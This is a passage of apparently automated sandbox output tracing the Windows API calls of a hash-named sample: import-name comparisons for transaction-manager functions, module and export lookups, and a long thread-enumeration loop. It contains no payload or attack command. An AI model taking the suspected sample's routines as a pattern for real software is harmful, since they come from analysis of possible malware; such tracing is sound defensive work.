(lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0290.743] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0290.743] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0290.743] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0290.743] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0290.743] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0290.743] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0290.743] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0290.743] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0290.743] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0290.744] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0290.745] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0290.745] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0290.745] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0290.745] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0290.745] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0290.745] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0290.745] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0290.745] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0290.745] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0290.745] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0290.745] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0290.745] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0290.745] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0290.745] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0290.746] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0290.746] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0290.746] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0290.746] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0290.746] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0290.746] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0290.746] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0290.746] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0290.746] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0290.746] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0290.746] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0290.746] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0290.746] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0290.746] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0290.746] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0290.746] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0290.746] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0290.746] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0290.746] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0290.746] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0290.747] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0290.747] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0290.747] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0290.747] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0290.747] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0290.747] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0290.747] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0290.747] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0290.747] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0290.747] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0290.747] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0290.747] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0290.747] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0290.747] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0290.747] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0290.747] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0290.747] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0290.747] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0290.747] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0290.747] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0290.747] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0290.747] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0290.748] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0290.748] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0290.748] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0290.748] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0290.748] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0290.748] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0290.748] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0290.748] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0290.748] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0290.748] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0290.748] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0290.748] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0290.748] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0290.748] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0290.748] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0290.748] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0290.748] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0290.748] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0290.749] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0290.749] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0290.749] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0290.749] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0290.749] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0290.749] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0290.749] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0290.749] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0290.749] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0290.749] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0290.749] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0290.750] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0290.750] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0290.750] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0290.750] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0290.750] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0290.750] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0290.750] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0290.750] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0290.750] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0290.750] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0290.750] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0290.750] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0290.750] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0290.751] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0290.751] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0290.751] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0290.751] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0290.751] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0290.751] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0290.751] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0290.751] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0290.751] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0290.751] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0290.751] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0290.751] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0290.752] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0290.752] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0290.752] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0290.752] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0290.752] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0290.752] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0290.752] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0290.752] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0290.752] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0290.752] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0290.752] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0290.753] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0290.753] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0290.753] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0290.753] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0290.753] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0290.753] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0290.753] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0290.753] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0290.753] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0290.753] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0290.753] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0290.753] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0290.753] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0290.753] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0290.754] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0290.754] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0290.754] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0290.754] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0290.754] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0290.754] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0290.754] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0290.754] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0290.754] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0290.754] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0290.754] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0290.755] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0290.755] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0290.755] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0290.755] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0290.755] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0290.755] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0290.755] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0290.755] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0290.755] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0290.755] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0290.755] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0290.755] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0290.906] GetProcessHeap () returned 0x540000 [0290.907] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2d45030 | out: hHeap=0x540000) returned 1 [0290.920] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0290.921] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0290.924] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1000) returned 0x2d45030 [0290.926] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2e) returned 0x5582d0 [0290.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="opj_has_thread_support", cchWideChar=-1, lpMultiByteStr=0x5582d0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opj_has_thread_support", lpUsedDefaultChar=0x0) returned 23 [0290.926] GetLastError () returned 0x0 [0290.927] SetLastError (dwErrCode=0x0) [0290.927] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_has_thread_supportW") returned 0x0 [0290.927] GetLastError () returned 0x7f [0290.927] SetLastError (dwErrCode=0x7f) [0290.927] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_has_thread_supportA") returned 0x0 [0290.927] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_has_thread_support") returned 0x7ffc45f5ecb0 [0290.928] GetActiveWindow () returned 0x0 [0290.928] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2d45030 | out: hHeap=0x540000) returned 1 [0290.928] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5582d0 | out: hHeap=0x540000) returned 1 [0290.928] GetCurrentProcessId () returned 0x13c4 [0290.928] GetCurrentThreadId () returned 0x98c [0290.928] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0290.939] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0290.942] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.094] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.119] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.120] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.121] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.416] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.417] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.418] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.419] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.420] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.420] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.421] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.422] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.422] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.423] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.423] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.424] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.425] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.426] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.427] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.428] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.428] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.429] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.430] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.431] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.432] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.433] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.434] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.435] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.436] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.436] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.437] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.439] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.440] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.441] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.442] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.442] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.443] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.444] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.445] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.446] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.446] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.447] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.448] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.448] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.449] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.450] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.450] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.451] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.595] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.597] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.598] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.599] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.599] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.600] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.601] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.601] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.602] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.602] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.603] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.604] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.604] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.605] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.606] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.606] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.607] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.608] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.608] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.609] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.610] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.610] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.611] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) 